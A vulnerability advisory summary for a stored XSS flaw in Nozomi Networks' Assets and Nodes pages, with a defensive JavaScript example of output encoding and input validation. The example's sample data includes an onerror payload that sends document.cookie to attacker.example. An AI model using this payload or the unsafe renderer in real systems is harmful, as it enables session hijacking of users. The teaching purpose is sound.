CVE-2025-40899
Published: 15 April 2026
Summary
CVE-2025-40899 is a high-severity Stored Cross-site Scripting (CWE-79) vulnerability in Nozomi Networks software (vendor inferred from references). The base score shown in this summary is 7.1 (High); note that the vendor's CVSS v3.1 vector quoted in the analysis below computes to 8.9, so the two sources disagree on the exact score while agreeing on High severity.
Operationally, exploitation aligns with the MITRE ATT&CK technique Command and Scripting Interpreter: JavaScript (T1059.007). It is ranked at the 20.3rd percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations identified by this analysis are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-40899 is a Stored Cross-Site Scripting (XSS) vulnerability (CWE-79) in the Assets and Nodes functionality of Nozomi Networks software, stemming from improper validation of an input parameter. Published on 2026-04-15, it carries a CVSS v3.1 base score of 8.9 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H): the attacker needs only low privileges over the network (AV:N, PR:L), the victim must view the affected page (UI:R), and because the payload runs in the victim's browser rather than in the component that stored it the scope is changed (S:C), with high integrity and availability impact and limited confidentiality impact.
An authenticated attacker with custom fields privileges can create a malicious custom field containing a JavaScript payload. When a victim views the Assets or Nodes pages, the stored XSS executes in their browser context, allowing the attacker to impersonate the victim and perform unauthorized actions, such as modifying application data, disrupting application availability, and accessing limited sensitive information.
Mitigation details are available in the vendor advisory NN-2026:2-01 at https://security.nozominetworks.com/NN-2026:2-01.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-209471
Vulnerability details
A Stored Cross-Site Scripting vulnerability was discovered in the Assets and Nodes functionality due to improper validation of an input parameter. An authenticated user with custom fields privileges can define a malicious custom field containing a JavaScript payload. When the victim views the Assets or Nodes pages, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information.
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS directly enables arbitrary JavaScript execution in the victim's browser (Command and Scripting Interpreter: JavaScript, T1059.007), and the payload can in turn ride the victim's authenticated session to act as them (Browser Session Hijacking, T1185).
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly addresses the root cause by requiring validation of the custom field parameters when they are defined, blocking injection of malicious JavaScript payloads at the point of storage.
- SI-15 (Information Output Filtering): prevents execution of already-stored XSS payloads by filtering or encoding custom field content when it is rendered into the Assets and Nodes pages in victims' browsers.
- SI-2 (Flaw Remediation): requires timely identification, reporting, and remediation of the stored XSS flaw, including applying the vendor fix referenced in advisory NN-2026:2-01.
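The attack path described above (an attacker-defined custom field rendered into the Assets or Nodes pages) and the two primary controls, SI-10 and SI-15, are easiest to see side by side in code. The following is an added example and not Nozomi Networks' code: the product's real rendering layer is not public, so the asset and custom-field object shapes, the function names, and the sample payload are all constructed for illustration. It contrasts an unsafe row renderer that interpolates untrusted strings into HTML with one that HTML-encodes every untrusted value (SI-15), and adds an allowlist check on the field name at definition time (SI-10), while showing why validation alone cannot replace encoding.

```javascript
// Added example (not Nozomi Networks code). Object shapes, names and the
// payload are assumptions made for illustration only.

// Constructed sample data: an asset row and two custom fields defined by a
// user who holds only "custom fields" privileges. One carries a stored XSS
// payload; the other is a legitimate value that happens to contain '<'.
const sampleAsset = { id: 42, name: 'PLC-07' };
const maliciousField = {
  name: 'Location',
  value: '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">',
};
const benignField = { name: 'Rack', value: 'A3 <spare>' };

// Unsafe pattern: untrusted strings are dropped straight into the markup.
// Every user who views the Assets page gets the onerror handler executed in
// their own authenticated browser session.
function renderRowUnsafe(asset, field) {
  return `<tr><td>${asset.name}</td><td>${field.name}</td><td>${field.value}</td></tr>`;
}

// SI-15, output filtering: encode the five characters that can change HTML
// structure so the browser renders the value as text rather than markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Safe pattern: every untrusted field, name and value alike, passes through
// escapeHtml before it is placed inside an element body.
function renderRowSafe(asset, field) {
  return `<tr><td>${escapeHtml(asset.name)}</td>` +
         `<td>${escapeHtml(field.name)}</td>` +
         `<td>${escapeHtml(field.value)}</td></tr>`;
}

// SI-10, input validation: reject a custom field definition whose name is
// not a short token of allowlisted characters. This is defence in depth, not
// a substitute for encoding: a value such as 'A3 <spare>' is legitimate data
// and must still be escaped at render time.
const FIELD_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9 _-]{0,63}$/;
function validateCustomFieldName(name) {
  return typeof name === 'string' && FIELD_NAME_RE.test(name);
}

// Crude check for a rendered fragment that still contains a live script sink:
// a <script> element or any tag carrying an on* event handler attribute.
// Suitable as a regression assertion on the rendering layer, not as a filter.
function containsExecutableMarkup(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

console.log('unsafe:', renderRowUnsafe(sampleAsset, maliciousField));
console.log('safe:  ', renderRowSafe(sampleAsset, maliciousField));
```

The safe renderer neutralises the stored payload even though validation of the field name would already have rejected it, and it also handles the benign value that a name allowlist could never be applied to. In a real application the same encoding has to be chosen per context (attribute, URL, JavaScript string), and a Content-Security-Policy that forbids inline handlers is a further backstop; none of that is a substitute for the vendor fix in NN-2026:2-01.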